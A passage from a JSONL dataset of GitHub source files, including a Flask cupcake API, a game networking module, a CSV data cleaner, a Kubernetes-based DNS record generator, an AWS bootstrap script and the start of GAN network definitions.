201)\n\n@app.route('/api/cupcakes/', methods=[\"PATCH\"])\ndef update_cupcake(id):\n \"\"\"PATCH /api/cupcakes/[cupcake-id]\n Update a cupcake with the id passed in the URL and flavor, size, rating and image data from the body of the request. \n You can always assume that the entire cupcake object will be passed to the backend.\n\n This should raise a 404 if the cupcake cannot be found.\n\n Respond with JSON of the newly-updated cupcake, like this: {cupcake: {id, flavor, size, rating, image}}.\n \"\"\"\n data = request.json\n cupcake = Cupcake.query.get_or_404(id) \n cupcake.flavor = data['flavor']\n cupcake.size = data['size']\n cupcake.rating = data['rating']\n cupcake.image = data['image']\n\n db.session.add(cupcake)\n db.session.commit() \n\n return jsonify(cupcake=cupcake.serialize())\n\n@app.route('/api/cupcakes/', methods=[\"DELETE\"])\ndef delete_cupcake(id):\n \"\"\"DELETE /api/cupcakes/[cupcake-id]\n This should raise a 404 if the cupcake cannot be found.\n\n Delete cupcake with the id passed in the URL. Respond with JSON like {message: \"Deleted\"}.\n \"\"\"\n cupcake = Cupcake.query.get_or_404(id) \n db.session.delete(cupcake) \n db.session.commit() \n return jsonify(message=\"Deleted\")\n\n\n\n\n\n","repo_name":"pasha-log/flask-cupcakes","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74458127607","text":"import logging\nimport socket\nimport select\nimport struct\nimport zlib\n\nfrom mm.common.events import (serialize_event_to_string,\n serialize_event_from_string,\n ClientConnectedEvent,\n ClientDisconnectedEvent,\n ClientEvent)\n\nLOG = logging.getLogger(__name__)\n\nDEFAULT_NETWORK_PORT = 8888\nCOMPRESSION_LEVEL = 1\n\n\ndef compress_data(data):\n return zlib.compress(data, COMPRESSION_LEVEL)\n\n\ndef decompress_data(data):\n return zlib.decompress(data)\n\n\nclass WriteBuffer(object):\n def __init__(self, max_size=None):\n self.buffer = bytearray()\n self.max_size = max_size\n\n def get_buffer_data(self):\n return self.buffer\n\n def get_buffer_size(self):\n return len(self.buffer)\n\n def is_empty(self):\n return len(self.buffer) == 0\n\n def can_write(self, length=1):\n if self.max_size is None:\n return True\n else:\n return len(self.buffer) + length <= self.max_size\n\n def skip(self, length):\n if len(self.buffer) >= length:\n self.buffer = self.buffer[length:]\n else:\n raise RuntimeError(\n 'Not enough data in buffer to skip %d bytes' % (length,))\n\n def _write(self, data):\n if self.can_write(len(data)):\n self.buffer += data\n return True\n else:\n return False\n\n def write_bytes(self, data):\n return (self.can_write(2 + len(data)) and\n self.write_uint16(len(data)) and\n self._write(data))\n\n def write_string(self, string):\n return self.write_bytes(string.encode('utf-8'))\n\n def write_int16(self, data):\n return self.can_write(2) and self._write(struct.pack('!h', data))\n\n def write_uint16(self, data):\n return self.can_write(2) and self._write(struct.pack('!H', data))\n\n def write_int32(self, data):\n return self.can_write(4) and self._write(struct.pack('!i', data))\n\n def write_uint32(self, data):\n return self.can_write(4) and self._write(struct.pack('!I', data))\n\n def write_float(self, data):\n return self.can_write(4) and self._write(struct.pack('!f', data))\n\n\nclass ReadBuffer(object):\n def __init__(self, buf=None):\n if buf:\n self.buffer = buf\n else:\n self.buffer = bytearray()\n\n def get_buffer_data(self):\n return self.buffer\n\n def get_buffer_size(self):\n return len(self.buffer)\n\n def feed(self, data):\n self.buffer += data\n\n def peek(self, length):\n if self.can_read(length):\n return self.buffer[:length]\n else:\n return None\n\n def can_read(self, length=1):\n return len(self.buffer) >= length\n\n def skip(self, length):\n if self.can_read(length):\n self.buffer = self.buffer[length:]\n\n def _read(self, length):\n if len(self.buffer) >= length:\n data = self.buffer[:length]\n self.buffer = self.buffer[length:]\n return data\n else:\n return None\n\n def read_bytes(self):\n length = struct.unpack('!H', self.peek(2))[0]\n if self.can_read(2 + length):\n self.skip(2)\n return self._read(length)\n else:\n return None\n\n def read_string(self):\n return self.read_bytes().decode('utf-8')\n\n def read_int16(self):\n data = self._read(2)\n if data:\n data = struct.unpack('!h', data)[0]\n return data\n\n def read_uint16(self):\n data = self._read(2)\n if data:\n data = struct.unpack('!H', data)[0]\n return data\n\n def read_int32(self):\n data = self._read(4)\n if data:\n data = struct.unpack('!i', data)[0]\n return data\n\n def read_uint32(self):\n data = self._read(2)\n if data:\n data = struct.unpack('!I', data)[0]\n return data\n\n\nclass Channel(object):\n MAX_MESSAGE_SIZE = 8192\n MAX_RECEIVE_SIZE = 8192\n\n def __init__(self, sock):\n self.sock = sock\n\n # in- and outbound buffers\n self.write_buffer = WriteBuffer()\n self.read_buffer = ReadBuffer()\n\n # keep track of last sent message id\n self.send_message_id = 1\n\n # keep track of last received message id\n self.recv_message_id = None\n\n # in- and outbound event queues\n self.in_events = []\n self.out_events = []\n\n def synchronize(self):\n return self.send_data() and self.receive_data()\n\n def receive_data(self):\n try:\n # check if there's anything on the socket\n readable, _, _ = select.select([self.sock], [], [], 0)\n if readable:\n # read data!\n data = self.sock.recv(self.MAX_RECEIVE_SIZE)\n\n if not data:\n # client disconnected\n return False\n\n # handle recevied data\n self.read_buffer.feed(data)\n self.on_data_received()\n\n return True\n except socket.error:\n LOG.exception('Socket error')\n return False\n\n def send_message(self, message_data):\n compressed_message_data = compress_data(message_data)\n\n #LOG.debug(\n # 'Compression %d -> %d bytes, compression factor %f',\n # len(message_data), len(compressed_message_data),\n # float(len(compressed_message_data)) / len(message_data))\n\n self.write_buffer.write_int32(self.send_message_id)\n self.write_buffer.write_bytes(compressed_message_data)\n\n self.send_message_id += 1\n\n def send_all_events(self):\n message_writer = WriteBuffer(self.MAX_MESSAGE_SIZE)\n\n for event in self.out_events:\n # serialize event to string\n serialized_event = serialize_event_to_string(event)\n\n if not message_writer.write_bytes(serialized_event):\n if len(serialized_event) > self.MAX_MESSAGE_SIZE:\n\n # TODO(fpj):\n # This will crash the game when there are a lot of entities\n # in the world. I haven't checked but it's probably the\n # DeltaStateEvent that becomes too large if there are a lot\n # of actors in it.\n\n # event will never fit in a message\n raise RuntimeError(\n 'Event size %d too big' % (len(serialized_event),))\n else:\n # send message and continue with the next\n self.send_message(message_writer.get_buffer_data())\n message_writer = WriteBuffer(self.MAX_MESSAGE_SIZE)\n if not message_writer.write_bytes(serialized_event):\n raise RuntimeError('Failed to write event')\n\n # send remaining data\n if not message_writer.is_empty():\n self.send_message(message_writer.get_buffer_data())\n\n # no outbound events left\n self.out_events = []\n\n def send_data(self):\n try:\n # serialize and send all outbound events\n if self.out_events:\n self.send_all_events()\n\n # check if we have anything to send, and try to send it\n if not self.write_buffer.is_empty():\n # check if the socket is writable\n _, writable, _ = select.select([], [self.sock], [], 0)\n if writable:\n # send data!\n bytes_sent = self.sock.send(\n self.write_buffer.get_buffer_data())\n\n if bytes_sent == 0:\n # something went wrong\n return False\n\n self.write_buffer.skip(bytes_sent)\n\n return True\n except socket.error:\n LOG.exception('Socket error')\n return False\n\n def on_data_received(self):\n # read message id\n if not self.recv_message_id:\n message_id = self.read_buffer.read_int32()\n if message_id:\n if (self.recv_message_id and\n self.recv_message_id != (message_id - 1)):\n raise RuntimeError(\n 'Out of sync %d + 1 != %d' %\n (self.recv_message_id, message_id))\n self.recv_message_id = message_id\n\n # read message data\n if self.recv_message_id:\n message_data = self.read_buffer.read_bytes()\n if message_data:\n self.on_message_received(decompress_data(message_data))\n\n def on_message_received(self, message_data):\n event_reader = ReadBuffer(message_data)\n while event_reader.can_read():\n serialized_event = event_reader.read_bytes()\n if serialized_event:\n self.in_events.append(\n serialize_event_from_string(serialized_event))\n else:\n # no more events\n break\n\n if event_reader.can_read():\n LOG.warning(\n '%d bytes of unparsed message data' %\n (event_reader.get_buffer_size(),))\n\n # ready for next message\n self.recv_message_id = None\n\n def send_event(self, event):\n self.out_events.append(event)\n\n def receive_events(self):\n for event in self.in_events:\n yield event\n\n # clear inbound queue\n self.in_events = []\n\n\nclass Client(object):\n def __init__(self, event_distributor):\n self.event_distributor = event_distributor\n self.server_socket = None\n self.channel = None\n\n def is_connected(self):\n return self.server_socket\n\n def connect(self, address, port):\n if self.is_connected():\n self.disconnect()\n\n LOG.info('Connecting to server %s:%d', address, port)\n self.server_socket = socket.create_connection((address, port))\n if self.server_socket:\n self.channel = Channel(self.server_socket)\n return True\n else:\n LOG.info('Failed to connect to server %s:%d', address, port)\n return False\n\n def disconnect(self):\n if self.is_connected():\n LOG.info('Disconnecting from server')\n self.server_socket.close()\n self.server_socket = None\n self.channel = None\n\n def send_event(self, event):\n if self.is_connected():\n self.channel.send_event(event)\n\n def read_from_server(self):\n if self.is_connected():\n if self.channel.receive_data():\n for event in self.channel.receive_events():\n self.event_distributor.post(event)\n else:\n LOG.info('Server closed the connection')\n self.disconnect()\n self.event_distributor.post(ClientDisconnectedEvent(0))\n\n def write_to_server(self):\n if self.is_connected():\n if not self.channel.send_data():\n LOG.info('Broken socket, disconnecting')\n self.disconnect()\n self.event_distributor.post(ClientDisconnectedEvent(0))\n\n\nclass Server(object):\n def __init__(self, event_distributor, port):\n self.event_distributor = event_distributor\n self.port = port\n self.server_socket = None\n self.client_sockets = []\n self.channels = {}\n\n def start_server(self):\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.server_socket.bind(('', self.port))\n self.server_socket.listen(10)\n\n def stop_server(self):\n if self.server_socket:\n self.server_socket.close()\n self.server_socket = None\n\n def accept_pending_clients(self):\n readable, _, _ = select.select([self.server_socket], [], [], 0)\n if readable:\n client_socket, address = self.server_socket.accept()\n self.client_sockets.append(client_socket)\n client_id = client_socket.fileno()\n self.channels[client_id] = Channel(client_socket)\n self.event_distributor.post(ClientConnectedEvent(client_id))\n LOG.info('Client %d connected', client_id)\n\n def broadcast_event(self, event):\n for channel in self.channels.values():\n channel.send_event(event)\n\n def send_event(self, client_id, event):\n self.channels[client_id].send_event(event)\n\n def read_from_clients(self):\n if not self.client_sockets:\n return\n readable, _, _ = select.select(self.client_sockets, [], [], 0)\n for sock in readable:\n client_id = sock.fileno()\n channel = self.channels[client_id]\n if channel.receive_data():\n for event in channel.receive_events():\n self.event_distributor.post(ClientEvent(client_id, event))\n else:\n LOG.info('Client %d disconnected', client_id)\n self.client_sockets.remove(sock)\n del self.channels[client_id]\n self.event_distributor.post(\n ClientDisconnectedEvent(client_id))\n\n def write_to_clients(self):\n if not self.client_sockets:\n return\n _, writable, _ = select.select([], self.client_sockets, [], 0)\n for sock in writable:\n client_id = sock.fileno()\n if not self.channels[client_id].send_data():\n LOG.info('Broken socket to client %d, disconnecting', client_id)\n self.client_sockets.remove(sock)\n del self.channels[client_id]\n self.event_distributor.post(\n ClientDisconnectedEvent(client_id))\n","repo_name":"fryingpanjoe/mmo-manager","sub_path":"mm/common/networking.py","file_name":"networking.py","file_ext":"py","file_size_in_byte":13931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7924884606","text":"# import directories\nimport os\nimport csv\n\n# path to data file\nemp_csv = os.path.join(\"Resources\", \"employee_data.csv\")\n\n# Lists to store data\nempID = []\nfirstName = []\nlastName = []\ndob = []\nssn = []\nstate = []\n\n# dictionary from : https://gist.github.com/afhaque/29f0f4f37463c447770517a6c17d08f5\nstatesABBV = {\n 'Alabama': 'AL',\n 'Alaska': 'AK',\n 'Arizona': 'AZ',\n 'Arkansas': 'AR',\n 'California': 'CA',\n 'Colorado': 'CO',\n 'Connecticut': 'CT',\n 'Delaware': 'DE',\n 'Florida': 'FL',\n 'Georgia': 'GA',\n 'Hawaii': 'HI',\n 'Idaho': 'ID',\n 'Illinois': 'IL',\n 'Indiana': 'IN',\n 'Iowa': 'IA',\n 'Kansas': 'KS',\n 'Kentucky': 'KY',\n 'Louisiana': 'LA',\n 'Maine': 'ME',\n 'Maryland': 'MD',\n 'Massachusetts': 'MA',\n 'Michigan': 'MI',\n 'Minnesota': 'MN',\n 'Mississippi': 'MS',\n 'Missouri': 'MO',\n 'Montana': 'MT',\n 'Nebraska': 'NE',\n 'Nevada': 'NV',\n 'New Hampshire': 'NH',\n 'New Jersey': 'NJ',\n 'New Mexico': 'NM',\n 'New York': 'NY',\n 'North Carolina': 'NC',\n 'North Dakota': 'ND',\n 'Ohio': 'OH',\n 'Oklahoma': 'OK',\n 'Oregon': 'OR',\n 'Pennsylvania': 'PA',\n 'Rhode Island': 'RI',\n 'South Carolina': 'SC',\n 'South Dakota': 'SD',\n 'Tennessee': 'TN',\n 'Texas': 'TX',\n 'Utah': 'UT',\n 'Vermont': 'VT',\n 'Virginia': 'VA',\n 'Washington': 'WA',\n 'West Virginia': 'WV',\n 'Wisconsin': 'WI',\n 'Wyoming': 'WY',\n}\n\n# with open(udemy_csv, encoding='utf-8') as csvfile:\nwith open(emp_csv) as fileHeader:\n csvReader = csv.reader(fileHeader, delimiter=\",\")\n\n csvHeader = next(csvReader)\n\n for row in csvReader:\n\n # read employee id\n empID.append(row[0])\n\n # read name find index for space\n space = row[1].find(' ')\n \n # store first name\n firstName.append(row[1][0:space])\n\n # store last name\n lastName.append(row[1][space+1:])\n\n # reformat DOB\n month = row[2][5:7]\n day = row[2][-2:]\n year = row[2][0:4]\n date = month + '/' + day + '/' + year\n\n # store DOB\n dob.append(date)\n\n # ssn reformat\n newSSN = '***-**-' + row[3][-4:]\n\n # store SSN\n ssn.append(newSSN)\n\n # use dictionary to convert state to abbrv\n state.append(statesABBV[row[4]])\n\n# combine strings\ncleaned_empData = zip(empID, firstName, lastName, dob, ssn, state)\n\n# set output file path\noutput = os.path.join(\"analysis\", \"cleanedEmpData.csv\")\n\n# open output file\nwith open(output, \"w\") as outputHeader:\n writer = csv.writer(outputHeader)\n\n # write the header row\n writer.writerow([\"Emp ID\", \"First Name\", \"Last Name\", \"DOB\", \"SSN\", \"State\"])\n\n # write zipped rows\n writer.writerows(cleaned_empData)","repo_name":"mscheme/python-challenge","sub_path":"PyBoss/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15090089655","text":"import random, math\r\nfrom Cat import Cat\r\n\r\nclass LazyCat(Cat):\r\n def __init__(self, coordinates, n):\r\n super().__init__(coordinates, n)\r\n self.n = 0\r\n self.probability = 1/(1+math.exp(-0.1*n))\r\n self.laziness = random.uniform(0, 1)\r\n\r\n def mouseInteraction(self, mouse):\r\n distance = math.sqrt((self.x - mouse.x)**2 + (self.y - mouse.y)**2)\r\n if distance < 4:\r\n if self.probability > self.laziness:\r\n self.n += 1\r\n mouse.x = mouse.x0\r\n mouse.y = mouse.y0\r\n\r\n def move(self):\r\n self.step = random.randint(-10, 10)","repo_name":"Yaskeir/Python","sub_path":"CatSim/1.0/LazyCat.py","file_name":"LazyCat.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9025508915","text":"import math\nt=int(input())\nfor i in range(t):\n n,a,b,k=list(map(int,input().strip().split(' ')))\n c=0\n if(a==b):\n print('Lose')\n else: \n n1=n+1\n arr=[False]*n1\n for i in range(a,n1,a):\n arr[i]=not(arr[i])\n for j in range(b,n1,b):\n arr[j]=not(arr[j])\n c=arr.count(True)\n if(c>=k):\n print('Win')\n else:\n print('Lose')\n \n","repo_name":"kaustubhdeokar/CompetitiveCoding","sub_path":"1/CodeChef/FebLong/do.py","file_name":"do.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"16986184582","text":"from __future__ import absolute_import\nfrom distutils.core import setup\n\nimport os.path\n\nrequirements_filename = os.path.join(\n os.path.dirname(os.path.abspath(__file__)), 'requirements.txt')\n\nwith open(requirements_filename) as fd:\n install_requires = [i.strip() for i in fd.readlines()]\n\nsetup(\n name='duo_client',\n version='3.0',\n description='Reference client for Duo Security APIs',\n author='Duo Security, Inc.',\n author_email='support@duosecurity.com',\n url='https://github.com/duosecurity/duo_client_python',\n packages=['duo_client'],\n package_data={'duo_client': ['ca_certs.pem']},\n license='BSD',\n classifiers=[\n 'Programming Language :: Python',\n 'License :: OSI Approved :: BSD License',\n ],\n install_requires=install_requires,\n)\n","repo_name":"amir17688/google_data_p2","sub_path":"51652_setup.py_C__Users_user_Desktop_data_2_data_google_data_duosecurity_duo_client_python.py","file_name":"51652_setup.py_C__Users_user_Desktop_data_2_data_google_data_duosecurity_duo_client_python.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6773648044","text":"from netCDF4 import Dataset\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef create_output_file(path):\n f = Dataset(path, \"w\", clobber = True)\n f.createDimension(\"swaths\", size = None)\n f.createDimension(\"scenes\", size = None)\n f.createDimension(\"swath_width\", size = 221)\n f.createDimension(\"date_string\", size = 14)\n f.createDimension(\"x_size\", size = 1900)\n f.createDimension(\"y_size\", size = 2200)\n\n f.createVariable(\"scene_id\", \"i8\", (\"scenes\"))\n f.createVariable(\"start_time\", \"c\", (\"swaths\", \"date_string\"))\n f.createVariable(\"end_time\", \"c\", (\"swaths\", \"date_string\"))\n\n # Location\n f.createVariable(\"lon\", \"f4\", (\"swaths\", \"swath_width\"))\n f.createVariable(\"lat\", \"f4\", (\"swaths\", \"swath_width\"))\n\n # GPROF\n g = f.createGroup(\"gprof\")\n g.createVariable(\"tcwv_index\", \"i4\", (\"swaths\", \"swath_width\"))\n g.createVariable(\"t2m_index\", \"i4\", (\"swaths\", \"swath_width\"))\n g.createVariable(\"st_index\", \"i4\", (\"swaths\", \"swath_width\"))\n g.createVariable(\"surface_precipitation\", \"f4\", (\"swaths\", \"swath_width\"))\n\n\n # 1c\n g = f.createGroup(\"1c\")\n g.createDimension(\"channels\", size = 13)\n g.createVariable(\"brightness_temperatures\", \"f4\", (\"swaths\", \"swath_width\", \"channels\"))\n\n # Opera\n g = f.createGroup(\"opera\")\n g.createVariable(\"precipitation_5\", \"f4\", (\"swaths\", \"swath_width\",))\n g.createVariable(\"precipitation_10\", \"f4\", (\"swaths\", \"swath_width\",))\n\n # Combined\n g = f.createGroup(\"combined\")\n g.createDimension(\"swaths_combined\", None)\n g.createDimension(\"swath_width_combined\", 49)\n g.createVariable(\"scene_id\", \"i4\", (\"swaths_combined\",))\n g.createVariable(\"lat\", \"f4\", (\"swaths_combined\", \"swath_width_combined\"))\n g.createVariable(\"lon\", \"f4\", (\"swaths_combined\", \"swath_width_combined\"))\n g.createVariable(\"surface_precipitation\", \"f4\", (\"swaths_combined\", \"swath_width_combined\"))\n\n return f\n\n","repo_name":"simonpf/gpm_article","sub_path":"scripts/colocations.py","file_name":"colocations.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19305728587","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\nimport logging\nimport json\nimport os\n\nclass LoadFile:\n def __init__(self):\n self.logger = logging.getLogger(\"chobomemo\")\n\n def loadfile(self, filename):\n memoList = {}\n try:\n if os.path.isfile(filename):\n with open(filename) as f:\n jsonData = json.load(f)\n memoList = {}\n idx = 0\n for memo in jsonData[\"data\"]:\n idx += 1\n item = {}\n item['id'] = memo[\"id\"]\n item['memo'] = memo[\"memo\"]\n item['index'] = str(idx)\n memoList[item['index']] = item\n self.logger.info(\"Success to load \" + filename)\n return memoList\n except:\n self.logger.exception(\"Loading failed:\" + filename)\n\n return {}\n\n\ndef test():\n \"\"\"For unittest\"\"\"\n fm = LoadFile()\n assert fm.loadfile(\"\") == {}\n fm.loadfile(\"v1_test05.cfm\")\n\n\n","repo_name":"chobocho/ChoboMemo2","sub_path":"src/store/loadfilev1.py","file_name":"loadfilev1.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72764295929","text":"# This script will read from SLS and external DNS all records on the CAN network and compute forward and reverse\n# commands in the format that nsupdate expects. It will check to make sure that all addresses fit inside the main CAN\n# subnet as well ensuring that only those records that can be resolved externally are created.\n#\n# To run it requires 3 things:\n# 1) The FQDN of the server to send the update to.\n# 2) A TOKEN environment variable exported for authentication with the API gateway.\n# 3) A kubeconfig that can be read by the Kubernetes Python API.\n#\n# By default when it is run it will output a file in the current directory that contains all the commands necessary\n# to update the forward and reverse zones for the CAN addresses.\n\nimport base64\nimport random\nimport json\nimport ast\nimport os\nimport requests\nimport urllib3\nimport argparse\nimport ipaddress\nfrom kubernetes import config, client\nfrom kubernetes.stream import stream\nimport yaml\n\nTTL = 86400\n\n\ndef format_nsupdate_record(name, host, type):\n return \"update add {} {} {} {}\".format(name, TTL, type, host)\n\n\ndef add_host(fqdn, ipaddress):\n # Check first to make sure this IP address fits into the supernet.\n if ipaddress not in supernet:\n return\n\n forward_record = \"{}\".format(format_nsupdate_record(fqdn, ipaddress, \"A\"))\n forward_records.append(forward_record)\n\n arpa_host = ipaddress.reverse_pointer\n reverse_record = \"{}\".format(format_nsupdate_record(arpa_host, fqdn, \"PTR\"))\n reverse_records.append(reverse_record)\n\n\nparser = argparse.ArgumentParser(description='Utility to build nsupdate compatible external DNS records.')\nparser.add_argument('--dns_server', type=str, action=\"store\", required=True,\n help='FQDN of the DNS server to nsupdate to.')\nparser.add_argument('--server_port', type=int, action=\"store\", default=53,\n help='Port of the DNS server.')\nparser.add_argument('--output_file', type=str, action=\"store\", default=\"./nsupdate-commands.txt\",\n help=\"File to output nsupdate commands to.\")\n\nparser.add_argument('--base_api_address', type=str, action=\"store\", default=\"http://cray-sls\",\n help=\"Base address for API gateway.\")\n\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nargs = parser.parse_args()\n\nNAMESPACE = \"services\"\n\ntoken = None\ntry:\n config.load_incluster_config()\nexcept config.ConfigException:\n try:\n config.load_kube_config()\n\n # If we're running outside the cluster we need to have an exported TOKEN.\n token = os.environ.get('TOKEN')\n if token is None:\n print(\"TOKEN can not be empty!\")\n exit(1)\n except config.ConfigException:\n raise Exception(\"Could not configure Kubernetes Python client!\")\n\ncore_v1 = client.CoreV1Api()\n\n# Read the site-init secret and get the domain name.\nsite_init_data = core_v1.read_namespaced_secret(\"site-init\", \"loftsman\")\ncustomizations_data = base64.b64decode(site_init_data.data['customizations.yaml'])\ncustomizations_yaml = yaml.safe_load(customizations_data)\nexternal_dns = customizations_yaml['spec']['network']['dns']['external']\n\n# Build up all the records before writing them out so we can do post-processing on them.\nforward_records = []\nreverse_records = []\n\n###\n# SLS\n###\nurl = \"{}/v1/networks/CAN\".format(args.base_api_address)\nheaders = None\nif token is not None:\n headers = {\"Authorization\": \"Bearer {}\".format(token)}\nresponse = requests.get(url, headers=headers, verify=False).json()\n\n# Need to know what the supernet all the addresses should fit into.\nsupernet = ipaddress.ip_network(response['IPRanges'][0])\n\nfor subnet in response['ExtraProperties']['Subnets']:\n if \"IPReservations\" in subnet:\n for reservation in subnet['IPReservations']:\n fqdn = \"{}.{}\".format(reservation['Name'], external_dns)\n host_ipaddress = ipaddress.ip_address(reservation['IPAddress'])\n add_host(fqdn, host_ipaddress)\n\n if \"Aliases\" in reservation:\n for alias in reservation['Aliases']:\n fqdn = \"{}.{}\".format(alias, external_dns)\n add_host(fqdn, host_ipaddress)\n\n###\n# External DNS\n###\nDUMP_COMMAND = ['sh', '-c', 'ETCDCTL_API=3 etcdctl get --prefix \"\" -w json']\n\npods = core_v1.list_namespaced_pod(NAMESPACE, label_selector=\"etcd_cluster=cray-externaldns-etcd\")\n\n# Pick a random member.\ntarget_etcd_member = random.choice(pods.items)\n\n# Get the records JSON.\ndump_output = stream(core_v1.connect_get_namespaced_pod_exec,\n target_etcd_member.metadata.name,\n NAMESPACE,\n container='etcd',\n command=DUMP_COMMAND,\n stdout=True)\n\n# This is supremely dumb: https://stackoverflow.com/a/55854788/293256\njson_output = json.loads(json.dumps(ast.literal_eval(dump_output)))\nkvs = json_output['kvs']\n\nfor kv in kvs:\n key = str(base64.b64decode(kv['key']))\n key_parts = key.split(\"/\")\n\n # Now for the fun part, we have to build the FQDN off the key parts going from end to beginning. For example:\n # [\"b'\", 'skydns', 'com', 'cray', 'dev', 'shandy', 'vcs', \"3f7d78ec'\"]\n # We need to turn that into vcs.shandy.dev.cray.com. Reverse it and whack off the first 2 and last 1 elements.\n key_parts.reverse()\n fqdn_parts = key_parts[1:-2]\n fqdn = \".\".join(fqdn_parts)\n\n # Now for the actual host information...same basic idea actually, split, reverse, and format.\n value_json = json.loads(base64.b64decode(kv['value']))\n host_ipaddress = ipaddress.ip_address(value_json['host'])\n\n add_host(fqdn, host_ipaddress)\n\n\n###\n# Output\n###\noutput_file = open(args.output_file, \"w\")\noutput_file.write(\"server {} {}\\n\".format(args.dns_server, args.server_port))\n\n# We have updates for two zones, forward and reverse. Start with forward.\nforward_records.sort()\noutput_file.write(\"\\n\\nzone {}\\n\".format(external_dns))\nfor record in forward_records:\n output_file.write(\"{}\\n\".format(record))\n\n# Send the update.\noutput_file.write(\"\\n\\nshow\\nsend\\nanswer\\n\")\n\n# Now reverse. First we have to compute what this zone is called.\nreverse_pointer = supernet.network_address.reverse_pointer\nzone_reverse = reverse_pointer.lstrip(\"0.\")\n\nreverse_records.sort()\noutput_file.write(\"\\n\\nzone {}\\n\".format(zone_reverse))\nfor record in reverse_records:\n output_file.write(\"{}\\n\".format(record))\n\n# Send the update.\noutput_file.write(\"\\n\\nshow\\nsend\\nanswer\\n\")\n\n# Close the output file.\noutput_file.close()\n","repo_name":"Cray-HPE/nsupdate-record-generator","sub_path":"generate-dns-records.py","file_name":"generate-dns-records.py","file_ext":"py","file_size_in_byte":6544,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"36054865584","text":"#############################################################################\r\n#\r\n#\r\n#\r\n# DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE\r\n# Version 2, December 2004\r\n#\r\n# Everyone is permitted to copy and distribute verbatim or modified\r\n# copies of this license document, and changing it is allowed as long\r\n# as the name is changed.\r\n#\r\n# DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE,\r\n# TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\r\n#\r\n# 0. You just DO WHAT THE FUCK YOU WANT TO\r\n#\r\n# -----------------------------------------------------\r\n# Sebastian Novak @ GitHub https://github.com/kernel-memory-dump\r\n# -----------------------------------------------------\r\n#\r\n#\r\n# @author Sebastian Novak\r\n#\r\n#\r\n#############################################################################\r\n\r\nfrom EC2Handler import EC2Handler\r\nfrom Config import Config\r\nfrom Config import *\r\nfrom SQSHandler import SQSHandler\r\nfrom S3Handler import S3Handler\r\nfrom log import *\r\n\r\nINIT_SCRIPT = \"ec2_init_template.sh\"\r\n\r\n\r\ndef main():\r\n\r\n handler = EC2Handler()\r\n config = acquire_config()\r\n\r\n print(\"Creating input/output buckets\")\r\n\r\n s3_input_handle = S3Handler(config.get_input_bucket_name())\r\n s3_input_handle.create_new_public_bucket()\r\n s3_output_handle = S3Handler(config.get_output_bucket_name())\r\n s3_output_handle.create_new_public_bucket()\r\n\r\n print(\"Initializing request/response queues\")\r\n write_to_log(\"Initializing request/response queues\")\r\n sqs_request = SQSHandler(config.get_request_queue_name())\r\n sqs_response = SQSHandler(config.get_response_queue_name())\r\n\r\n print(\"Firing up EC2 server instance...\")\r\n\r\n\r\n write_to_log(\"Initializing EC2 server...\")\r\n handler.create_instance(INIT_SCRIPT)\r\n\r\n if handler.ec2_instance is None:\r\n print(\"Fatal error: failed to create EC2 instance!\")\r\n return\r\n\r\n print(\"Initizalization completed! Server id is:\" + handler.instance_id)\r\n print(\"Updating config.json, sending acquired server-id\")\r\n config.set_server_id(handler.instance_id)\r\n config.update()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"kernel-memory-dump/mrkirm2-2016-snovak","sub_path":"Project/bootstrap.py","file_name":"bootstrap.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73914987127","text":"import torch\nimport torch.nn as nn\nimport functools\nfrom torch.autograd import Variable\nimport numpy as np\n\nfrom network.bilinear import crop_bbox_batch\nfrom network.layers import GlobalAvgPool\n\n###############################################################################\n# Functions\n###############################################################################\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm2d') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\ndef get_norm_layer(norm_type='instance'):\n if norm_type == 'batch':\n norm_layer = functools.partial(nn.BatchNorm2d, affine=True)\n elif norm_type == 'instance':\n norm_layer = functools.partial(nn.InstanceNorm2d, affine=False)\n else:\n raise NotImplementedError('normalization layer [%s] is not found' % norm_type)\n return norm_layer\n\ndef define_G(input_nc, output_nc, ngf, netG, n_downsample_global=3, n_blocks_global=9, n_local_enhancers=1, \n n_blocks_local=3, norm='instance'): \n norm_layer = get_norm_layer(norm_type=norm) \n if netG == 'global': \n netG = GlobalGenerator(input_nc, output_nc, ngf, n_downsample_global, n_blocks_global, norm_layer) \n elif netG == 'local': \n netG = LocalEnhancer(input_nc, output_nc, ngf, n_downsample_global, n_blocks_global, \n n_local_enhancers, n_blocks_local, norm_layer)\n elif netG == 'encoder':\n netG = Encoder(input_nc, output_nc, ngf, n_downsample_global, 